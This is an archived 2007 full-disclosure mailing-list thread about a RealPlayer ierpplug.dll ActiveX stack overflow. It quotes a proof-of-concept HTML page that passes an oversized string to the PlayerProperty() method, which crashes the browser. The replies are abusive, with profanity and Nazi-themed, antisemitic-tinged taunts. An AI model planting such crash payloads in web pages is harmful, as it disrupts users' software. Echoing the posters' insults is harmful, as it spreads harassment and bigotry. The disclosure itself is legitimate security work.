'Re: [Full-disclosure] UPDATED: RealNetworks RealPlayer ierpplug.dll'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    Re: [Full-disclosure] UPDATED: RealNetworks RealPlayer ierpplug.dll
From:       "Joey Mengele" <joey.mengele () hushmail ! com>
Date:       2007-11-27 16:06:38
Message-ID: 20071127160639.7BEB2DA820 () mailserver8 ! hushmail ! com
[Download RAW message or body]

LOLOLOLOL ok you win, client side denial of service warrants your 5 
electronic mail messages with up to the minute updates. I bet this 
one will be exploited in the wild!

Get a life LOLOL!

J

On Wed, 31 Dec 1969 19:00:00 -0500 Elazar Broad 
<elazarb@earthlink.net> wrote:
>"Stack Overflow" - learn to read. A DoS attack still has some 
>security implications...
>
>-----Original Message-----
>>From: Joey Mengele <joey.mengele@hushmail.com>
>>Sent: Nov 27, 2007 1:05 AM
>>To: full-disclosure@lists.grok.org.uk, elazarb@earthlink.net
>>Subject: Re: [Full-disclosure] UPDATED: RealNetworks RealPlayer 
>ierpplug.dll ActiveX Control Multiple Stack Overflows
>>
>>Holy mother of Hitler will you shut the fuck up already. This is 
>a 
>>"stack overflow" not a "stack based buffer overflow". There are 
>no 
>>security implications here. You are worse than Jewha Mati Laurio. 
>
>>
>>Elazar, please do not post to this list again. Please leave the 
>>trolling to the professionals.
>>
>>J
>>
>>P.S. Sorry for the swear words John.
>>
>>On Wed, 31 Dec 1969 19:00:00 -0500 Elazar Broad 
>><elazarb@earthlink.net> wrote:
>>>After some creative Googling, I am revising my original post. I 
>>>believe that the Import() method overflow that I originally 
>posted 
>>>is really http://www.securityfocus.com/bid/26130, although I am 
>>>not sure why Linux is listed under the "Vulnerable" section, so 
>I 
>>>am taking it out of the PoC code. Real claims to have patched 
>this 
>>>back in October, but I can still throw a stack overflow 
>exception 
>>>via this function using the originally stated version of 
>>>RealPlayer(which I installed last night). I am now listing this 
>>>vulnerability as RealNetworks RealPlayer ierpplug.dll ActiveX 
>>>Control PlayerProperty() Method Stack Overflow, and it might be 
>>>wise to list this under a separate BID. PoC as follows:
>>>
>>>-------------
>>><!--
>>>written by e.b.
>>>-->
>>><html>
>>> <head>
>>>  <script language="JavaScript" DEFER>
>>>    function Check() {
>>>    var s = "AAAA";
>>>
>>>    while (s.length < 999999) s=s+s;
>>>
>>>     var obj = new ActiveXObject("IERPCTL.IERPCTL"); //{FDC7A535-
>
>>>4070-4B92-A0EA-D9994BCC0DC5}
>>>   
>>>      var obj2 = obj.PlayerProperty(s);
>>>
>>>
>>>   }
>>>  </script>
>>>
>>> </head>
>>> <body onload="JavaScript: return Check();">
>>>
>>> </body>
>>></html> 
>>>-------------
>>>
>>>Elazar
>>>
>>>_______________________________________________
>>>Full-Disclosure - We believe in it.
>>>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>>Hosted and sponsored by Secunia - http://secunia.com/
>>
>>--
>>Click for your daily horoscope, learn about money, love & family.
>>http://tagline.hushmail.com/fc/Ioyw6h4c4ZBHl2sHpyjNjTLgy4OTny6jhrF
>rqMryjXVt31vg2H7tNd/
>>

--
Click for your daily horoscope, learn about money, love & family.
http://tagline.hushmail.com/fc/Ioyw6h4c4ZARVCeSZnQsflA3BGgTQlm8TvOc2Qh6Kh1tD32a9sgsa8/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic